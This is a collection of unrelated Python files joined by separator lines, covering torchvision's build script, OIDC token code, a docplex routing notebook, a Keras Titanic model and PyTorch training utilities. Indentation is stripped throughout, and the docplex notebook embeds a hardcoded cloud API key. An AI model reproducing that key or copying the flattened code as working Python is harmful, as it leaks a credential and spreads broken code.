(jpeg_found, jpeg_conda, jpeg_include, jpeg_lib) = find_library("jpeglib", vision_include)
use_jpeg = use_jpeg and jpeg_found
if use_jpeg:
print("Building torchvision with JPEG image support")
print(f" libjpeg include path: {jpeg_include}")
print(f" libjpeg lib path: {jpeg_lib}")
image_link_flags.append("jpeg")
if jpeg_conda:
image_library += [jpeg_lib]
image_include += [jpeg_include]
else:
print("Building torchvision without JPEG image support")
image_macros += [("JPEG_FOUND", str(int(use_jpeg)))]
# Locating nvjpeg
# Should be included in CUDA_HOME for CUDA >= 10.1, which is the minimum version we have in the CI
nvjpeg_found = (
extension is CUDAExtension
and CUDA_HOME is not None
and os.path.exists(os.path.join(CUDA_HOME, "include", "nvjpeg.h"))
)
use_nvjpeg = use_nvjpeg and nvjpeg_found
if use_nvjpeg:
print("Building torchvision with NVJPEG image support")
image_link_flags.append("nvjpeg")
else:
print("Building torchvision without NVJPEG image support")
image_macros += [("NVJPEG_FOUND", str(int(use_nvjpeg)))]
image_path = os.path.join(extensions_dir, "io", "image")
image_src = glob.glob(os.path.join(image_path, "*.cpp")) + glob.glob(os.path.join(image_path, "cpu", "*.cpp"))
if is_rocm_pytorch:
image_src += glob.glob(os.path.join(image_path, "hip", "*.cpp"))
# we need to exclude this in favor of the hipified source
image_src.remove(os.path.join(image_path, "image.cpp"))
else:
image_src += glob.glob(os.path.join(image_path, "cuda", "*.cpp"))
if use_png or use_jpeg:
ext_modules.append(
extension(
"torchvision.image",
image_src,
include_dirs=image_include + include_dirs + [image_path],
library_dirs=image_library + library_dirs,
define_macros=image_macros,
libraries=image_link_flags,
extra_compile_args=extra_compile_args,
)
)
# Locating ffmpeg
ffmpeg_exe = shutil.which("ffmpeg")
has_ffmpeg = ffmpeg_exe is not None
ffmpeg_version = None
# FIXME: Building torchvision with ffmpeg on MacOS or with Python 3.9
# FIXME: causes crash. See the following GitHub issues for more details.
# FIXME: https://github.com/pytorch/pytorch/issues/65000
# FIXME: https://github.com/pytorch/vision/issues/3367
if sys.platform != "linux" or (sys.version_info.major == 3 and sys.version_info.minor == 9):
has_ffmpeg = False
if has_ffmpeg:
try:
# This is to check if ffmpeg is installed properly.
ffmpeg_version = subprocess.check_output(["ffmpeg", "-version"])
except subprocess.CalledProcessError:
print("Building torchvision without ffmpeg support")
print(" Error fetching ffmpeg version, ignoring ffmpeg.")
has_ffmpeg = False
use_ffmpeg = use_ffmpeg and has_ffmpeg
if use_ffmpeg:
ffmpeg_libraries = {"libavcodec", "libavformat", "libavutil", "libswresample", "libswscale"}
ffmpeg_bin = os.path.dirname(ffmpeg_exe)
ffmpeg_root = os.path.dirname(ffmpeg_bin)
ffmpeg_include_dir = os.path.join(ffmpeg_root, "include")
ffmpeg_library_dir = os.path.join(ffmpeg_root, "lib")
gcc = os.environ.get("CC", shutil.which("gcc"))
platform_tag = subprocess.run([gcc, "-print-multiarch"], stdout=subprocess.PIPE)
platform_tag = platform_tag.stdout.strip().decode("utf-8")
if platform_tag:
# Most probably a Debian-based distribution
ffmpeg_include_dir = [ffmpeg_include_dir, os.path.join(ffmpeg_include_dir, platform_tag)]
ffmpeg_library_dir = [ffmpeg_library_dir, os.path.join(ffmpeg_library_dir, platform_tag)]
else:
ffmpeg_include_dir = [ffmpeg_include_dir]
ffmpeg_library_dir = [ffmpeg_library_dir]
for library in ffmpeg_libraries:
library_found = False
for search_path in ffmpeg_include_dir + include_dirs:
full_path = os.path.join(search_path, library, "*.h")
library_found |= len(glob.glob(full_path)) > 0
if not library_found:
print("Building torchvision without ffmpeg support")
print(f" {library} header files were not found, disabling ffmpeg support")
use_ffmpeg = False
else:
print("Building torchvision without ffmpeg support")
if use_ffmpeg:
print("Building torchvision with ffmpeg support")
print(f" ffmpeg version: {ffmpeg_version}")
print(f" ffmpeg include path: {ffmpeg_include_dir}")
print(f" ffmpeg library_dir: {ffmpeg_library_dir}")
# TorchVision base decoder + video reader
video_reader_src_dir = os.path.join(this_dir, "torchvision", "csrc", "io", "video_reader")
video_reader_src = glob.glob(os.path.join(video_reader_src_dir, "*.cpp"))
base_decoder_src_dir = os.path.join(this_dir, "torchvision", "csrc", "io", "decoder")
base_decoder_src = glob.glob(os.path.join(base_decoder_src_dir, "*.cpp"))
# Torchvision video API
videoapi_src_dir = os.path.join(this_dir, "torchvision", "csrc", "io", "video")
videoapi_src = glob.glob(os.path.join(videoapi_src_dir, "*.cpp"))
# exclude tests
base_decoder_src = [x for x in base_decoder_src if "_test.cpp" not in x]
combined_src = video_reader_src + base_decoder_src + videoapi_src
ext_modules.append(
CppExtension(
"torchvision.video_reader",
combined_src,
include_dirs=[
base_decoder_src_dir,
video_reader_src_dir,
videoapi_src_dir,
extensions_dir,
*ffmpeg_include_dir,
*include_dirs,
],
library_dirs=ffmpeg_library_dir + library_dirs,
libraries=[
"avcodec",
"avformat",
"avutil",
"swresample",
"swscale",
],
extra_compile_args=["-std=c++17"] if os.name != "nt" else ["/std:c++17", "/MP"],
extra_link_args=["-std=c++17" if os.name != "nt" else "/std:c++17"],
)
)
# Locating video codec
# CUDA_HOME should be set to the cuda root directory.
# TORCHVISION_INCLUDE and TORCHVISION_LIBRARY should include the location to
# video codec header files and libraries respectively.
video_codec_found = (
extension is CUDAExtension
and CUDA_HOME is not None
and any([os.path.exists(os.path.join(folder, "cuviddec.h")) for folder in vision_include])
and any([os.path.exists(os.path.join(folder, "nvcuvid.h")) for folder in vision_include])
and any([os.path.exists(os.path.join(folder, "libnvcuvid.so")) for folder in library_dirs])
)
use_video_codec = use_video_codec and video_codec_found
if (
use_video_codec
and use_ffmpeg
and any([os.path.exists(os.path.join(folder, "libavcodec", "bsf.h")) for folder in ffmpeg_include_dir])
):
print("Building torchvision with video codec support")
gpu_decoder_path = os.path.join(extensions_dir, "io", "decoder", "gpu")
gpu_decoder_src = glob.glob(os.path.join(gpu_decoder_path, "*.cpp"))
cuda_libs = os.path.join(CUDA_HOME, "lib64")
cuda_inc = os.path.join(CUDA_HOME, "include")
ext_modules.append(
extension(
"torchvision.Decoder",
gpu_decoder_src,
include_dirs=include_dirs + [gpu_decoder_path] + [cuda_inc] + ffmpeg_include_dir,
library_dirs=ffmpeg_library_dir + library_dirs + [cuda_libs],
libraries=[
"avcodec",
"avformat",
"avutil",
"swresample",
"swscale",
"nvcuvid",
"cuda",
"cudart",
"z",
"pthread",
"dl",
"nppicc",
],
extra_compile_args=extra_compile_args,
)
)
else:
print("Building torchvision without video codec support")
if (
use_video_codec
and use_ffmpeg
and not any([os.path.exists(os.path.join(folder, "libavcodec", "bsf.h")) for folder in ffmpeg_include_dir])
):
print(
" The installed version of ffmpeg is missing the header file 'bsf.h' which is "
" required for GPU video decoding. Please install the latest ffmpeg from conda-forge channel:"
" `conda install -c conda-forge ffmpeg`."
)
return ext_modules
class clean(distutils.command.clean.clean):
def run(self):
with open(".gitignore") as f:
ignores = f.read()
for wildcard in filter(None, ignores.split("\n")):
for filename in glob.glob(wildcard):
try:
os.remove(filename)
except OSError:
shutil.rmtree(filename, ignore_errors=True)
# It's an old-style class in Python 2.7...
distutils.command.clean.clean.run(self)
if __name__ == "__main__":
print(f"Building wheel {package_name}-{version}")
write_version_file()
with open("README.md") as f:
readme = f.read()
setup(
# Metadata
name=package_name,
version=version,
author="PyTorch Core Team",
author_email="soumith@pytorch.org",
url="https://github.com/pytorch/vision",
description="image and video datasets and models for torch deep learning",
long_description=readme,
long_description_content_type="text/markdown",
license="BSD",
# Package info
packages=find_packages(exclude=("test",)),
package_data={package_name: ["*.dll", "*.dylib", "*.so", "prototype/datasets/_builtin/*.categories"]},
zip_safe=False,
install_requires=requirements,
extras_require={
"scipy": ["scipy"],
},
ext_modules=get_extensions(),
python_requires=">=3.8",
cmdclass={
"build_ext": BuildExtension.with_options(no_python_abi_suffix=True),
"clean": clean,
},
)
|
import dash_bootstrap_components as dbc
from dash import html
toast = dbc.Toast(
[html.P("This is the content of the toast", className="mb-0")],
header="This is the header",
)
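# Minimal usage sketch (assumption, not part of the original snippet): render the
# toast inside a tiny Dash app. `app.run` is the entry point on recent Dash
# releases; older 2.x versions used `app.run_server` instead.
if __name__ == "__main__":
    from dash import Dash
    app = Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])
    app.layout = html.Div([toast])
    app.run(debug=True)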
|
import torch.nn as nn
import torchvision.models as models
class EmbeddingNet(nn.Module):
def __init__(self, backbone=None):
super().__init__()
if backbone is None:
backbone = models.resnet50(num_classes=128)
self.backbone = backbone
def forward(self, x):
x = self.backbone(x)
x = nn.functional.normalize(x, dim=1)
return x
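# Minimal usage sketch (illustrative only): embed a random batch and check that the
# rows come out as L2-normalized 128-d vectors (the resnet50 head has 128 outputs).
if __name__ == "__main__":
    import torch
    net = EmbeddingNet()
    emb = net(torch.randn(2, 3, 224, 224))
    print(emb.shape)        # torch.Size([2, 128])
    print(emb.norm(dim=1))  # ~1.0 per row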
|
from datetime import timedelta
import time
import uuid
from Crypto.PublicKey.RSA import importKey
from django.utils import timezone
from jwkest.jwk import RSAKey as jwk_RSAKey
from jwkest.jwk import SYMKey
from jwkest.jws import JWS
from oidc_provider.lib.utils.common import get_issuer
from oidc_provider.models import (
Code,
RSAKey,
Token,
)
from oidc_provider import settings
def create_id_token(user, aud, nonce, at_hash=None, request=None):
"""
Receives a user object and aud (audience).
Then creates the id_token dictionary.
See: http://openid.net/specs/openid-connect-core-1_0.html#IDToken
Return a dic.
"""
sub = settings.get('OIDC_IDTOKEN_SUB_GENERATOR', import_str=True)(user=user)
expires_in = settings.get('OIDC_IDTOKEN_EXPIRE')
# Convert datetimes into timestamps.
now = timezone.now()
iat_time = int(time.mktime(now.timetuple()))
exp_time = int(time.mktime((now + timedelta(seconds=expires_in)).timetuple()))
user_auth_time = user.last_login or user.date_joined
auth_time = int(time.mktime(user_auth_time.timetuple()))
dic = {
'iss': get_issuer(request=request),
'sub': sub,
'aud': str(aud),
'exp': exp_time,
'iat': iat_time,
'auth_time': auth_time,
}
if nonce:
dic['nonce'] = str(nonce)
if at_hash:
dic['at_hash'] = at_hash
processing_hook = settings.get('OIDC_IDTOKEN_PROCESSING_HOOK')
if isinstance(processing_hook, (list, tuple)):
for hook in processing_hook:
dic = settings.import_from_str(hook)(dic, user=user)
else:
dic = settings.import_from_str(processing_hook)(dic, user=user)
return dic
def encode_id_token(payload, client):
"""
Represent the ID Token as a JSON Web Token (JWT).
Return a hash.
"""
alg = client.jwt_alg
if alg == 'RS256':
keys = []
for rsakey in RSAKey.objects.all():
keys.append(jwk_RSAKey(key=importKey(rsakey.key), kid=rsakey.kid))
if not keys:
raise Exception('You must add at least one RSA Key.')
elif alg == 'HS256':
keys = [SYMKey(key=client.client_secret, alg=alg)]
else:
raise Exception('Unsupported key algorithm.')
_jws = JWS(payload, alg=alg)
return _jws.sign_compact(keys)
def create_token(user, client, scope, id_token_dic=None):
"""
Create and populate a Token object.
Return a Token object.
"""
token = Token()
token.user = user
token.client = client
token.access_token = uuid.uuid4().hex
if id_token_dic is not None:
token.id_token = id_token_dic
token.refresh_token = uuid.uuid4().hex
token.expires_at = timezone.now() + timedelta(
seconds=settings.get('OIDC_TOKEN_EXPIRE'))
token.scope = scope
return token
def create_code(user, client, scope, nonce, is_authentication,
code_challenge=None, code_challenge_method=None):
"""
Create and populate a Code object.
Return a Code object.
"""
code = Code()
code.user = user
code.client = client
code.code = uuid.uuid4().hex
if code_challenge and code_challenge_method:
code.code_challenge = code_challenge
code.code_challenge_method = code_challenge_method
code.expires_at = timezone.now() + timedelta(
seconds=settings.get('OIDC_CODE_EXPIRE'))
code.scope = scope
code.nonce = nonce
code.is_authentication = is_authentication
return code
|
import io
from setuptools import find_packages
from setuptools import setup
with io.open("README.rst", "rt", encoding="utf8") as f:
readme = f.read()
setup(
name="Pallets-Sphinx-Themes",
version="1.1.3",
url="https://github.com/pallets/pallets-sphinx-themes/",
license="BSD-3-Clause",
author="Pallets",
author_email="contact@palletsprojects.com",
description="Sphinx themes for Pallets and related projects.",
long_description=readme,
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
zip_safe=False,
install_requires=["Sphinx", "packaging"],
entry_points={
"pygments.styles": [
"pocoo = pallets_sphinx_themes.themes.pocoo:PocooStyle",
"jinja = pallets_sphinx_themes.themes.jinja:JinjaStyle",
]
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Framework :: Sphinx",
"Framework :: Sphinx :: Theme",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Documentation",
"Topic :: Documentation :: Sphinx",
"Topic :: Software Development :: Documentation",
],
)
|
#!/usr/bin/env python
# coding: utf-8
# In[11]:
import docplex.mp.model as cpx
import networkx as nx
import pandas as pd
import matplotlib.pyplot as plt
from math import sqrt
import networkx as nx
# In[12]:
t_n = 5
cij = [[0,55,105,80,60],[60,0,75,60,75],[110,90,0,195,135],[80,60,175,0,85],[60,75,120,80,0]]
cij
# In[13]:
opt_model = cpx.Model(name="MIP Model")
xij = opt_model.binary_var_matrix(t_n, t_n)
for i in range(t_n):
opt_model.add_constraint(xij[i,i] == 0)
for i in range(t_n):
# print(obj.number)
opt_model.add_constraint(opt_model.sum(xij[i,j] for j in range(t_n)) == 1)
for i in range(t_n):
# print(obj.number)
opt_model.add_constraint(opt_model.sum(xij[j,i] for j in range(t_n)) == 1)
# In[14]:
opt_model.minimize(opt_model.sum(xij[i,j]*cij[i][j] for i in range(t_n) for j in range(t_n)))
url = 'https://api-oaas.docloud.ibmcloud.com/job_manager/rest/v1/'
key = 'api_555476e8-b9e9-4d02-a523-cd50d8bbd4d5'
# In[15]:
for it in range(20):
s = opt_model.solve(url=url,key=key)
G = nx.DiGraph()
G.add_nodes_from(range(t_n))
for i in range(t_n):
for j in range(t_n):
if xij[i,j].solution_value == 1:
#print(i,j)
G.add_edge(i,j)
#if it >= 1:
#a = nx.find_cycle(G)
a_list = list(nx.simple_cycles(G))
if len(a_list) == 1:
break
for a_it in range(len(a_list)-1):
k = a_list[a_it]
print(k)
# nx.find_cycle(G)
#k = [a[i][0] for i in range(len(a))]
a_n = list(range(t_n))
for i in k:
a_n.remove(i)
opt_model.add_constraint(opt_model.sum(xij[k[i],j] for i in range(len(k)) for j in a_n) == 1)
####################################################################################################################
# In[19]:
from matplotlib.pyplot import figure
figure(num=None, figsize=(10, 10), dpi=80, facecolor='w', edgecolor='k')
# nx.draw(G,with_labels=True,pos=nx.circular_layout(G))
nx.draw(G,with_labels=True)
fig= plt.figure(figsize=(60,30))
plt.show()
# In[17]:
opt_model.print_solution()
print('Min path would be the objective')
# In[ ]:
|
def string_clean(s):
return ''.join(a for a in s if not a.isdigit())
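# Illustrative checks: every digit character is dropped, everything else is kept.
assert string_clean('! !') == '! !'
assert string_clean('123456789') == ''
assert string_clean('This looks5 grea8t!') == 'This looks great!'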
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from pants.jvm.resolve.jvm_tool import JvmToolBase
class ScroogeSubsystem(JvmToolBase):
options_scope = "scrooge"
help = "The Scrooge Thrift IDL compiler (https://twitter.github.io/scrooge/)."
default_version = "21.12.0"
default_artifacts = ("com.twitter:scrooge-generator_2.13:{version}",)
default_lockfile_resource = (
"pants.backend.codegen.thrift.scrooge",
"scrooge.default.lockfile.txt",
)
|
import numpy as np
from collections import Counter
from typing import Iterable, Literal
def find_most_common(row: Iterable[str], mode: Literal["elem", "count"]):
"""
Given iterable of words, return either most common element or its count
"""
if mode == "elem":
return Counter(row).most_common(1)[0][0]
elif mode == "count":
return Counter(row).most_common(1)[0][1]
def ue_variation_ratio(answers):
answers = [np.array(e, dtype=object) for e in answers]
answers = np.stack(answers, -1)
scores = 1.0 - np.array(
[find_most_common(ans, "count") / answers.shape[1] for ans in answers]
)
return scores
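# Minimal usage sketch: each inner list is one model's (or annotator's) answers to
# four questions; the score per question is 1 - (top answer count) / (num answerers).
if __name__ == "__main__":
    demo_answers = [
        ["a", "b", "a", "c"],
        ["a", "b", "b", "c"],
        ["a", "a", "b", "c"],
    ]
    print(ue_variation_ratio(demo_answers))  # [0.0, 0.333..., 0.333..., 0.0]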
|
import csv, re
import numpy as np
from keras import Sequential
from keras.layers import Dense
# Age patterns
p1 = re.compile(r"0\.")
# Ticket patterns
p3 = re.compile(r"(\d*?)$")
def getAge(arg):
fract = p1.match(arg)
if arg == "":
return 32
elif arg[:2] == "0.":
return int(arg[fract.span()[1]:])
elif arg[-2:] == ".5":
return int(arg[:-2])
else:
return int(arg)
def getTicket(arg):
search = p3.search(arg)
ticket = arg[search.span()[0]:]
if ticket == "":
return 0
else:
return int(ticket)
def dataclean(inputarray):
#PassengerId,Survived,Pclass,Name,Sex,Age,SibSp,Parch,Ticket,Fare,Cabin,Embarked
output = []
v = 1
embarkedMapping = {"S":1, "Q":2, "C":3, "":1}
# skipping the first row
for row in inputarray:
if row[0] == "PassengerId":
pass
else:
if len(row) == 12:
v = 2
pclass = int(row[v].strip())
name = row[v+1].strip()
sex = 0 if row[v+2].strip() == "male" else 1
age = getAge(row[v+3].strip())
x = row[v+4].strip()
sibsp = int(x) if x in ['1', '0', '3', '4', '2', '5', '8'] else 0
x = row[v+5].strip()
parch = int(x) if x in ['0', '1', '2', '5', '3', '4', '6'] else 0
ticket = getTicket(row[v+6].strip())
fare = float(row[v+7].strip())
# Cabin - skip
cabin = row[v+8].strip()
embarked = embarkedMapping[row[v+9].strip()]
output += [[pclass, sex, age, sibsp, parch, fare, embarked]]
return output
def getlabels(arg):
labels = []
for row in arg:
if row[0] == "PassengerId":
pass
else:
labels += [int(row[1])]
return labels
with open("train.csv", mode='r') as f:
x = list(csv.reader(f))
x_train = dataclean(x)
y_train = getlabels(x)
x_test = np.array(x_train[-100:])
y_test = np.array(y_train[-100:])
x_train = np.array(x_train[:-100])
y_train = np.array(y_train[:-100])
model = Sequential()
model.add(Dense(7, input_shape=(7,)))
model.add(Dense(3))
model.add(Dense(1, activation="sigmoid"))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
history = model.fit(x_train, y_train, epochs=5)
score = model.evaluate(x_test, y_test)
print(score)
|
def isDigit(strng):
""" is_digit == PEP8 (forced mixedCase by Codewars) """
try:
float(strng)
return True
except ValueError:
return False
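# Illustrative checks: float() accepts signs, decimals and exponent notation, so all
# of those count as numeric for this kata-style helper.
assert isDigit("3")
assert isDigit("-3.23")
assert isDigit("1e5")
assert not isDigit("3-4")
assert not isDigit("")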
|
import os
from smqtk.utils.plugin import get_plugins
from ._interface_hash_index import HashIndex
__all__ = [
'HashIndex', 'get_hash_index_impls',
]
def get_hash_index_impls(reload_modules=False):
"""
Discover and return discovered ``HashIndex`` classes. Keys in the returned
map are the names of the discovered classes, and the paired values are the
actual class type objects.
We search for implementation classes in:
- modules next to this file this function is defined in (ones that
begin with an alphanumeric character),
- python modules listed in the environment variable
``HASH_INDEX_PATH``
- This variable should contain a sequence of python module
specifications, separated by the platform specific PATH
separator character (``;`` for Windows, ``:`` for unix)
Within a module we first look for a helper variable by the name
``HASH_INDEX_CLASS``, which can either be a single class object or
an iterable of class objects, to be specifically exported. If the variable
is set to None, we skip that module and do not import anything. If the
variable is not present, we look at attributes defined in that module for
classes that descend from the given base class type. If none of the above
are found, or if an exception occurs, the module is skipped.
:param reload_modules: Explicitly reload discovered modules from source.
:type reload_modules: bool
:return: Map of discovered class object of type ``HashIndex``
whose keys are the string names of the classes.
:rtype: dict[str, type]
"""
this_dir = os.path.abspath(os.path.dirname(__file__))
env_var = "HASH_INDEX_PATH"
helper_var = "HASH_INDEX_CLASS"
return get_plugins(__name__, this_dir, env_var, helper_var,
HashIndex, reload_modules=reload_modules)
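# Usage sketch: list whatever HashIndex implementations are discoverable in the
# current environment (the exact keys depend on installed plugin modules).
if __name__ == "__main__":
    for _name, _cls in get_hash_index_impls().items():
        print(_name, _cls)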
|
import numpy as np
import tensorflow as tf
import os
import cv2
from tqdm.notebook import tqdm
tf2 = tf.compat.v2
# constants
KMNIST_IMG_SIZE = 28
KMNIST_TRAIN_IMAGE_COUNT = 60000
KMNIST_TEST_IMAGE_COUNT = 10000
PARALLEL_INPUT_CALLS = 16
def pre_process_train(ds):
X = np.empty((KMNIST_TRAIN_IMAGE_COUNT, KMNIST_IMG_SIZE, KMNIST_IMG_SIZE, 1))
y = np.empty((KMNIST_TRAIN_IMAGE_COUNT,))
for index, d in tqdm(enumerate(ds.batch(1))):
X[index, :, :] = d['image']
y[index] = d['label']
return X, y
def pre_process_test(ds):
X = np.empty((KMNIST_TEST_IMAGE_COUNT, KMNIST_IMG_SIZE, KMNIST_IMG_SIZE, 1))
y = np.empty((KMNIST_TEST_IMAGE_COUNT,))
for index, d in tqdm(enumerate(ds.batch(1))):
X[index, :, :] = d['image']
y[index] = d['label']
return X, y
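# Usage sketch (assumption: the tensorflow_datasets package is installed; this
# module does not import it itself). KMNIST examples come as dicts with 'image'
# and 'label' keys, which is exactly what pre_process_* expects.
if __name__ == '__main__':
    import tensorflow_datasets as tfds
    train_ds = tfds.load('kmnist', split='train')
    X_train, y_train = pre_process_train(train_ds)
    print(X_train.shape, y_train.shape)  # (60000, 28, 28, 1) (60000,)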
|
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# hsv is Hue Sat Value
    lower_range = np.array([0, 175, 175])    # HSV lower bound
    upper_range = np.array([255, 255, 255])  # HSV upper bound
    mask = cv2.inRange(hsv, lower_range, upper_range)
    res = cv2.bitwise_and(frame, frame, mask=mask)  # the mask acts as a pixel-wise filter
if cv2.waitKey(1) == 13:
break
# frame=cv2.flip(frame,1)
cv2.imshow("original", frame)
cv2.imshow("mask", mask)
cv2.imshow("res", res)
cap.release()
cv2.destroyAllWindows()
|
import sys
import os
f = open("C://Users/OZ/Documents/python/atcoder/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
import statistics
n = int(input())
a = list(map(int,input().split()))
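# Choosing an offset c that minimizes sum_i |a_i - (c + i)| is the classic
# "minimize the sum of absolute deviations" problem for the values a_i - i,
# and its optimum is attained at their median (computed below as bf).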
b = []
for i in range(n):
b.append(a[i]-i)
bf = int(statistics.median(b))
ans = 0
for i in range(n):
ans += abs(a[i] - bf - i)
print(ans)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 2 12:54:26 2019
@author: juan
"""
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import numpy as np
import torchvision
from torchvision import datasets, models, transforms
import matplotlib.pyplot as plt
import time
import os
import copy
import argparse
import torch.onnx
from tqdm import tqdm
def imshow(inp, title=None):
"""Imshow for Tensor."""
inp = inp.numpy().transpose((1, 2, 0))
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
plt.imshow(inp)
if title is not None:
plt.title(title)
plt.pause(0.001) # pause a bit so that plots are updated
def visualize_sample(dataloaders, class_names):
inputs, classes = next(iter(dataloaders['train']))
# Make a grid from batch
out = torchvision.utils.make_grid(inputs)
imshow(out, title=[class_names[x] for x in classes])
def load_model(path, model, classes, percentage_frozen):
if model == "densenet":
model_conv = torchvision.models.densenet121(pretrained=False)
num_ftrs = model_conv.classifier.in_features
model_conv.classifier = nn.Linear(num_ftrs, classes)
elif model == "mobilenet":
model_conv = torchvision.models.mobilenet_v2(pretrained=False)
num_ftrs = model_conv.classifier[1].in_features
model_conv.classifier[1] = nn.Linear(num_ftrs, classes)
elif model == "squeezenet":
model_conv = torchvision.models.squeezenet1_0(pretrained=True)
num_channels = model_conv.classifier[1].in_channels
model_conv.classifier[1] = nn.Conv2d(num_channels, classes,
kernel_size=(1, 1),
stride=(1, 1))
elif model == "resnet":
model_conv = torchvision.models.resnet18(pretrained=False)
num_ftrs = model_conv.fc.in_features
model_conv.fc = nn.Linear(num_ftrs, classes)
total_param = round(percentage_frozen*len(list(model_conv.parameters())))
for param in list(model_conv.parameters())[:total_param]:
param.requires_grad = False
optimizer = optim.SGD(filter(lambda p: p.requires_grad,
model_conv.parameters()), lr=0.001,
momentum=0.9)
checkpoint = torch.load(path)
model_conv.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
model_conv.eval()
return model_conv
def save_model(epoch, model, optimizer, accuracy, loss, classes, path):
torch.save({
'epoch': epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'accuracy': accuracy,
'classes': classes
}, path)
def export_to_onnx(path, model, classes, percentage_frozen=0.9):
model_conv = load_model(path, model, classes, percentage_frozen)
batch_size = 4
x = torch.randn(batch_size, 3, 224, 224, requires_grad=True)
torch.onnx.export(model_conv,
x,
os.path.join("./saved_models/", str(model) + ".onnx"),
export_params=True,
opset_version=10,
do_constant_folding=True)
def load_data(data_dir):
data_transforms = {
'train': transforms.Compose([
transforms.Resize((320, 320)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize((320, 320)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'test': transforms.Compose([
transforms.Resize((320, 320)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),
data_transforms[x])
for x in ['train', 'val', 'test']}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],
batch_size=4,
shuffle=True, num_workers=4)
for x in ['train', 'val', 'test']}
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val',
'test']}
class_names = image_datasets['train'].classes
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
return dataloaders, dataset_sizes, class_names, device, image_datasets
def get_mean_and_std(dataset, device):
    '''Compute the per-channel mean and std of a dataset.'''
    dataloader = torch.utils.data.DataLoader(dataset, batch_size=1,
                                             shuffle=True, num_workers=2)
    mean = torch.zeros(3)
    std = torch.zeros(3)
    print('==> Computing mean and std..')
    for inputs, targets in tqdm(dataloader):
        inputs = inputs.to(device)
        targets = targets.to(device)
        for i in range(3):
            mean[i] += inputs[:, i, :, :].mean()
            std[i] += inputs[:, i, :, :].std()
    mean.div_(len(dataset))
    std.div_(len(dataset))
    return mean, std
def evaluate_model(model, dataloaders, dataset_sizes, device):
    since = time.time()
    model = model.to(device)
    model.eval()
    running_corrects = 0
    with torch.no_grad():  # inference only, no gradients needed
        for inputs, labels in dataloaders['test']:
            inputs = inputs.to(device)
            labels = labels.to(device)
            outputs = model(inputs)
            _, preds = torch.max(outputs, 1)
            running_corrects += torch.sum(preds == labels.data)
    epoch_acc = running_corrects.double() / dataset_sizes['test']
    time_elapsed = time.time() - since
    mean_inference_time = time_elapsed / dataset_sizes['test']
    print('{} Inference time: {:.4f} Acc: {:.4f} NumParam: {}'.format(
        'test', mean_inference_time, epoch_acc,
        sum(p.numel() for p in model.parameters())))
def train_model(model, criterion, optimizer, scheduler, num_epochs,
dataloaders, device, dataset_sizes, classes, path):
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train', 'val']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
if phase == 'train':
scheduler.step()
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
print('{} Loss: {:.4f} Acc: {:.4f}'.format(
phase, epoch_loss, epoch_acc))
# deep copy the model
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
save_model(epoch, model, optimizer, epoch_acc, epoch_loss,
classes, path)
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
print('Best val Acc: {:4f}'.format(best_acc))
# load best model weights
model.load_state_dict(best_model_wts)
return model
def train(epochs, model, classes, percentage_frozen, device,
dataloaders, dataset_sizes, path):
if model == "densenet":
model_conv = torchvision.models.densenet121(pretrained=True)
num_ftrs = model_conv.classifier.in_features
model_conv.classifier = nn.Linear(num_ftrs, classes)
elif model == "mobilenet":
model_conv = torchvision.models.mobilenet_v2(pretrained=True)
num_ftrs = model_conv.classifier[1].in_features
model_conv.classifier[1] = nn.Linear(num_ftrs, classes)
elif model == "squeezenet":
model_conv = torchvision.models.squeezenet1_0(pretrained=True)
num_channels = model_conv.classifier[1].in_channels
model_conv.classifier[1] = nn.Conv2d(num_channels, classes,
kernel_size=(1, 1),
stride=(1, 1))
